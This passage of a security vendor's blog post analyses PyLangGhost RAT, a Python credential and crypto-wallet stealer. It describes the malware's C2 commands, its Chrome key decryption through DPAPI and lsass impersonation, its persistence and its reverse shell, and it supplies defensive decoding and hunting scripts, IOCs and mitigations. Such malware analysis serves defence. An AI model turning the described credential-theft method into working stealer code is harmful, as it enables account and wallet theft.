    Then, it runs csshost.exe nvidia.py. The filename csshost.exe is mildly obfuscated by being split in two parts (“css” & “host.exe”) before execution. 

    Disguised Python Environment 

    But what is csshost.exe? 

    It’s actually a renamed python.exe binary. Nothing more. No packing, no exotic tricks; just Python, rebranded. 

    The Lib.zip file is a clean Python environment bundled with standard libraries, containing nothing malicious or unusual. 

    Lib.zip contents, clean

    A Decoy and Its Real Payload 

    Funny enough, if you try to download the same file manually with a different User-Agent, the server returns a legitimate driver instead: a clever decoy tactic. 

    On the other hand, nvidia.py imports three additional components: api.py, config.py, and command.py. The last one, in turn, also uses util.py and auto.py.  

    Core Modules and Their Roles 

    Let’s break down the 3 modules, starting with config.py. 

    This file defines a set of constants used throughout the malware lifecycle, including message types, command codes, and operational parameters. 

    Here’s a quick reference of the command dictionary defined in config.py: 

    Code Function
    qwer  Get system information 
    asdf  Upload a file 
    zxcv  Download a file 
    vbcx  Open a terminal session 
    qalp  Detach terminal (background) 
    ghd  Wait 
    89io  Gather Chrome extension data 
    gi%#  Exfiltrate Chrome cookie store 
    kyci  Exfiltrate Chrome keychain 
    dghh  Exit the implant 
    Command dictionary on config.py

    Immediately after that, a C2 server based in the United Kingdom is declared (some sources indicate “Private Client – Iran”), along with a registry key used for persistence, and a list of Chrome extensions targeted for exfiltration, including MetaMask, BitKeep, Coinbase Wallet, and Phantom. 

    Extensions list, C2 server and persistence key

    Coming up next, api.py manages communication with the C2 server we just saw in config.py. There are three main functions: 

    1. Packet0623make, which encrypts data in transit with the RC4 cipher, builds a packet, and computes a checksum. RC4 is obsolete and weak, but simple, which may explain the choice. 
    2. Packet0623decode, which validates the checksum and decrypts the packet. 
    3. Htxp0623Exchange, which simply posts the packet to the server without TLS encryption, making the RC4-and-MD5 cocktail an even weaker choice. 
    Package building using RC4
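
    For analysts who capture this traffic in a sandbox, the weak obfuscation is good news: RC4 is symmetric and trivially reimplemented. The Python sketch below decodes a packet under an assumed layout (a 16-byte MD5 checksum of the ciphertext followed by the RC4-encrypted body) with a made-up key; the real key and exact layout would have to be recovered from the sample’s config.py.

from hashlib import md5

def rc4(key: bytes, data: bytes) -> bytes:
    # Plain RC4 keystream cipher; encryption and decryption are the same operation.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

def decode_packet(blob: bytes, key: bytes) -> bytes:
    # Assumed layout: MD5(ciphertext) followed by ciphertext. Validate, then decrypt.
    checksum, ciphertext = blob[:16], blob[16:]
    if md5(ciphertext).digest() != checksum:
        raise ValueError("checksum mismatch: wrong key or corrupted capture")
    return rc4(key, ciphertext)

# Round trip with a placeholder key, mimicking a captured 'qwer' (system info) command
key = b"placeholder-key"
ciphertext = rc4(key, b"qwer")
packet = md5(ciphertext).digest() + ciphertext
print(decode_packet(packet, key))   # b'qwer'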

    Now command.py acts as a dispatcher, interpreting both malware logic and C2 communications, and executing instructions accordingly. It also handles status messages defined in the config.py module we examined earlier. 

    The key functions are: 

    Function  Description 
    ProcessInfo  Collects the current user, hostname, OS, architecture, and the malware (daemon) version.  
    ProcessUpload  Allows the attacker to upload compressed files to the victim’s machine. 
    ProcessDownload  Stages files or folders for exfiltration. If the target is a folder, it gets compressed before transmission. 
    ProcessTerminal  Opens a reverse shell or executes arbitrary commands, depending on the mode selected. 
    makeMsg0623 / decodeMsg0623  Serialize and deserialize base64-encoded messages exchanged between implant and C2. 
    ProcessAuto  Triggers automation routines from the auto.py module. 
    Function to open a reverse shell or run arbitrary commands

    You probably remember that command.py imports two other custom modules: util.py and auto.py. Let’s review them as well. 

    Module util.py implements three functions: 

    Function  Description 
    com0715press  Compresses files in-memory as .tar.gz  
    decom0715press  Extracts .tar.gz files from memory to disk 
    valid0715relPath  Validates relative paths to prevent path traversal 
    Auxiliary functions from util.py
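
    The path check is a standard defensive pattern worth borrowing in your own tooling; a generic Python equivalent (not the sample’s actual code) could look like this:

import os

def is_safe_rel_path(base_dir: str, rel_path: str) -> bool:
    # True only if rel_path still resolves inside base_dir after normalization.
    base = os.path.abspath(base_dir)
    target = os.path.abspath(os.path.join(base, rel_path))
    return os.path.commonpath([base, target]) == base

print(is_safe_rel_path("/tmp/extract", "docs/report.txt"))   # True
print(is_safe_rel_path("/tmp/extract", "../../etc/passwd"))  # False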

    Finally, the most critical module: auto.py. 

    This module implements two key functions: 

    • AutoGatherMode: Collects configuration data from cryptocurrency browser extensions such as MetaMask, BitKeep, Coinbase Wallet, and Phantom. 
    • AutoCookieMode: Extracts login artifacts, including credentials and cookies, from Google Chrome. 

    The autoGatherMode function searches for the user’s Google Chrome profile directory (AppData\Local\Google\Chrome\User Data), starting with the Default profile and then enumerating others. It compresses the configuration directories of the targeted extensions into a single archive named gather.tar.gz and exfiltrates it for manual analysis, with the goal of enabling account takeover or compromising cryptocurrency wallets. 

    Exfiltrating Google Chrome Profiles in a compressed file

    With the rise of information-stealing malware, browser vendors have introduced various countermeasures to protect sensitive data such as password managers, cookies, and encrypted storage vaults. Chrome is no exception. To bypass these protections, the malware includes functions designed to check whether the user has administrative privileges and to retrieve Chrome’s encryption key through different methods, depending on the browser version, as the protection mechanisms vary. 

    The autoCookieMode function, on the other hand, starts by checking whether the user has administrative privileges. If not, it relaunches itself using runas, triggering a UAC (User Account Control) prompt. The prompt is intentionally deceptive: it simply displays “python.exe” as the requesting binary, providing no additional context or visual indicators. This subtle form of social engineering increases the likelihood of the user granting permission. 

    If the prompt is accepted, the malware gains elevated privileges, which are necessary to interact with privileged APIs such as the Data Protection API (DPAPI) used to retrieve Chrome’s encryption keys. If the user declines, the malware continues execution with the current user’s privileges. 

    Malicious UAC prompt

    It then creates a file named chrome_logins_dump.txt to store the extracted credentials. To do so, it accesses Chrome’s Local State file, which contains either an encrypted_key (in v10) or an app_bound_encrypted_key (in v20+). These keys are not stored in plaintext but encoded in Base64 and encrypted using Windows DPAPI. While they are accessible to the current user, they require decryption before use. 

    Google Chrome Keys Harvesting

    In Chrome v10, the encryption key is protected solely by the user’s DPAPI context and can be decrypted directly. In Chrome v20 and later, the key is app-bound and encrypted twice — first with the machine’s DPAPI context, and then again with the user’s. To bypass this layered protection, the malware impersonates the lsass.exe process to temporarily gain SYSTEM privileges. 

    Impersonating lsass.exe

    It then applies both layers of decryption, yielding a key blob which, once parsed, reveals the AES master key used to decrypt Chrome’s stored credentials. 

    Once the key is obtained by either method, the malware connects to the Login Data SQLite database and extracts all stored credentials, applying the corresponding decryption logic for v10 or v20 entries depending on the case. 

    Credentials dumped by the process

    At this point, it’s game over for the victim. 

    With the module functionality now understood, the next step is to examine the malware’s core component: nvidia.py. Before diving in, here’s a summary of the auxiliary functions contained in this module. 

    • check_adminRole: Checks if the current process has administrative privileges using IsUserAnAdmin(). 
    • GetSecretKey: Extracts and decrypts the AES key used by Chrome (v10) from the Local State file using DPAPI. 
    • DecryPayload: Decrypts a payload using a given cipher. 
    • GenCipher: Constructs an AES-GCM cipher object using a given key and IV. 
    • DecryPwd: Decrypts v10-style Chrome passwords using AES-GCM and the secret key obtained via DPAPI. 
    • impersonate_lsass: Context manager that impersonates the lsass.exe process to gain SYSTEM privileges. 
    • parse_key_blob: Parses Chrome’s v20 encrypted key blob structure to extract the IV, ciphertext, tag, and (if present) encrypted AES key. 
    • decrypt_with_cng: Decrypts data using the Windows CNG API and a hardcoded key name (“Google Chromekey1”). 
    • byte_xor: Performs XOR between two byte arrays (used to unmask AES key in v20 key blobs). 
    • derive_v20_master_key: Decrypts and derives the AES master key from parsed v20 Chrome blobs, supporting multiple encryption flags (AES, ChaCha20, masked AES). 

    From Recon to Full Control 

    Now, to the core component: nvidia.py

    This module begins by registering a registry key to establish persistence, assigning a unique identifier (UUID) to the host, and creating a pseudo–mutex-like mechanism via a .store file to prevent multiple instances from running simultaneously. It then enters a loop, continuously listening for new instructions from the C2 server. Additionally, it supports standalone execution with specific command-line arguments, enabling it to immediately perform actions such as stealing cookies or login data. 

    Analysis in ANY.RUN shows that all communication with the C2 servers is carried out over raw IP addresses, with no domain names used. While the traffic is not encrypted with TLS, it is at least obfuscated using RC4: a weak method, but still an added layer of concealment. 

    View real case inside ANY.RUN sandbox 

    Traffic to the C2 Server

    The sandbox quickly flags the traffic as suspicious. Because the malware uses the default python-requests User-Agent and sends multiple rapid requests, this pattern becomes a reliable detection indicator. 
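
    That observation translates directly into a hunting query. The Python sketch below scans proxy log records for bursts of python-requests traffic sent straight to raw IP addresses; the log schema, the burst size, and the 60-second window are assumptions to adapt to your own telemetry.

import re
from collections import defaultdict

RAW_IP_HOST = re.compile(r"^\d{1,3}(\.\d{1,3}){3}(:\d+)?$")

def suspicious_sources(proxy_events, burst=5, window_s=60):
    # Return source hosts that sent a burst of python-requests traffic to raw IPs.
    hits = defaultdict(list)
    for ev in proxy_events:
        if ev["user_agent"].startswith("python-requests/") and RAW_IP_HOST.match(ev["dest_host"]):
            hits[ev["src_host"]].append(ev["ts"])
    flagged = []
    for src, times in hits.items():
        times.sort()
        for i in range(len(times) - burst + 1):
            if times[i + burst - 1] - times[i] <= window_s:   # burst requests inside the window
                flagged.append(src)
                break
    return flagged

# Placeholder destination from a documentation IP range, not a live indicator
events = [{"src_host": "WS-042", "dest_host": "203.0.113.10:8080",
           "user_agent": "python-requests/2.31.0", "ts": t} for t in range(0, 50, 10)]
print(suspicious_sources(events))   # ['WS-042']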

    Traffic is automatically marked as suspicious

    Another key observation: most of the malware artifacts used in this campaign register only 0 to 3 detections on VirusTotal, making them particularly stealthy. Fortunately, ANY.RUN immediately identifies these samples as 100/100 malicious, starting with the initial update.vbs loader. 

    update.vbs loader marked as malicious

    Other components, including nvidia.py, the main launcher, are also flagged instantly with a 100/100 score, providing early warning against this evolving threat. 

    nvidia.py loader marked as malicious

    New malware, you say? Let’s take a closer look. 

    Gophers, Ghosts & AI 

    A variant of this sample was recently observed by other security laboratories, which noted strong similarities to GoLangGhost RAT. In fact, this appears to be a full reimplementation of that RAT in Python, but with a notable twist. 

    Analysis revealed numerous linguistic patterns and unusual coding constructions, including dead code, large commented-out sections, and Go-style logic structures, suggesting that the port from Go to Python was at least partially assisted by AI tools. 

    Ghosts, Gophers, Pythons, and AI, all converging in a single malware family.  

    Let’s go to the ATT&CK Matrix now, which ANY.RUN generates automatically. 

    PyLangGhost RAT ATT&CK Details 

    PyLangGhost RAT shares several tactics, techniques, and procedures (TTPs) with its related families OtterCookie, InvisibleFerret, and BeaverTail, but also introduces some new ones: 

    T1036  Masquerading  Renames legitimate binaries such as python.exe to csshost.exe. 
    T1059  Command and Scripting Interpreter  Initiates execution by using wscript.exe to run update.vbs and csshost.exe to launch the nvidia.py loader. 
    T1083  File and Directory Discovery  Enumerates user profiles and browser extensions. 
    T1012  Query Registry  Gains persistence via registry entries created by the update.vbs script. 
    MITRE ATT&CK Matrix

    Business Impact of PyLangGhost RAT 

    PyLangGhost RAT poses a significant risk to organizations in the technology, finance, and cryptocurrency sectors, with potential consequences including: 

    • Financial losses: Compromised cryptocurrency wallets and stolen credentials can lead directly to asset theft and fraudulent transactions. 
    • Data breaches: Exfiltration of sensitive corporate data, browser-stored credentials, and internal documents can expose intellectual property, customer information, and strategic plans. 
    • Operational disruption: Persistent remote access allows attackers to move laterally, deploy additional payloads, and disrupt business-critical systems. 
    • Reputational damage: Public disclosure of a breach tied to a high-profile state-sponsored group can undermine client trust and brand credibility. 
    • Regulatory consequences: Data theft incidents may trigger compliance violations (e.g., GDPR, CCPA, financial regulations) resulting in legal penalties and reporting obligations. 

    Given its low detection rate and targeted social engineering approach, PyLangGhost RAT enables attackers to operate inside a network for extended periods before discovery, increasing both the scope and cost of an incident. 

    How to Fight Against PyLangGhost RAT 

    Defending against PyLangGhost RAT requires a combination of proactive detection, security awareness, and layered defenses: 

    • Use behavior-based analysis: Solutions like ANY.RUN’s Interactive Sandbox can detect PyLangGhost RAT in minutes by exposing its execution chain, raw IP C2 connections, and credential theft activity. 
    • Validate unexpected commands: Educate employees to never run commands or scripts provided during job interviews or online “technical tests” without verification from security teams. 
    • Restrict administrative privileges: Limit the ability for standard users to run processes with elevated rights, reducing the malware’s ability to retrieve encrypted browser keys. 
    • Monitor for anomalous network traffic: Look for unusual outbound connections to raw IPs or rapid repeated HTTP requests from unexpected processes. 
    • Harden browser data security: Apply policies to clear cookies and credentials regularly, disable unneeded browser extensions, and enforce hardware-backed encryption where available. 
    • Incident response readiness: Maintain a process for rapid sandbox testing of suspicious files or scripts to shorten investigation times and reduce business impact. 

    Spot Similar Threats Early, Minimizing Business Risk 

    When facing dangerous malware like PyLangGhost RAT, speed of detection is critical. Every minute an attacker remains undetected increases the chances of stolen data, financial loss, and operational disruption. 

    ANY.RUN’s Interactive Sandbox helps organizations identify and analyze threats like PyLangGhost RAT within minutes, combining real-time execution tracking with behavior-based detection to uncover even low-detection or newly emerging malware. 

    • Rapid incident response: Detect threats early to stop lateral movement, data exfiltration, and further compromise. 
    • Lower investigation costs: Automated analysis delivers verdicts quickly, reducing the time and resources needed for manual investigation. 
    • Faster, smarter decisions: Clear visualized execution flows help security teams assess impact and choose the right containment measures. 
    • Increased SOC efficiency: Streamlines detection, analysis, and reporting in one workflow, eliminating unnecessary manual steps. 
    • Proactive threat hunting: Flags stealthy or low-signature artifacts, enabling defenders to identify and block similar threats before they spread. 

    Early detection for business means lower risk, reduced costs, and stronger resilience against advanced cyberattacks. 

    Try ANY.RUN to see how it can strengthen your proactive defense 

    Gathered IOCs 

    Domain: 360scanner[.]store

    IPv4: 13[.]107[.]246[.]45

    IPv4: 151[.]243[.]101[.]229 

    URL: https[:]//360scanner[.]store/cam-v-b74si.fix

    URL: http[:]//151[.]243[.]101[.]229[:]8080/ 

    SHA256 (auto.py.bin) = bb794019f8a63966e4a16063dc785fafe8a5f7c7553bcd3da661c7054c6674c7 

    SHA256 (command.py.bin) = c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb 

    SHA256 (config.py.bin) = c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45 

    SHA256 (nvidia.py.bin) = a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940 

    SHA256 (util.py.bin) = ef04a839f60911a5df2408aebd6d9af432229d95b4814132ee589f178005c72f 

    FileName: chrome_logins_dump.txt 

    FileName: gather.tar.gz 

    Mutex: .store 
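
    As a starting point for a host sweep, the short Python sketch below looks for the artifact names listed above in a temp directory; the search roots are assumptions, and in practice you would feed these names and hashes to your EDR or forensic tooling instead.

import os

ARTIFACT_NAMES = {"chrome_logins_dump.txt", "gather.tar.gz", ".store",
                  "nvidia.py", "update.vbs", "csshost.exe"}

def hunt(roots):
    # Yield full paths of files matching the known PyLangGhost artifact names.
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                if name.lower() in ARTIFACT_NAMES:
                    yield os.path.join(dirpath, name)

if __name__ == "__main__":
    temp = os.environ.get("TEMP", "/tmp")
    for match in hunt([temp]):
        print("Possible PyLangGhost artifact:", match)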

    Further Reading 

    https://otx.alienvault.com/pulse/688186afb933279c4be00337

    https://app.any.run/tasks/275e3573-0b3e-4e77-afaf-fe99b935c510 

    https://www.virustotal.com/gui/file/a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940/detection 

    https://www.virustotal.com/gui/file/c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45?nocache=1

    https://www.virustotal.com/gui/file/c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb/community

    The post PyLangGhost RAT: Rising Data Stealer from Lazarus Group Targeting Finance and Technology  appeared first on ANY.RUN’s Cybersecurity Blog.

    ANY.RUN’s Cybersecurity Blog – ​Read More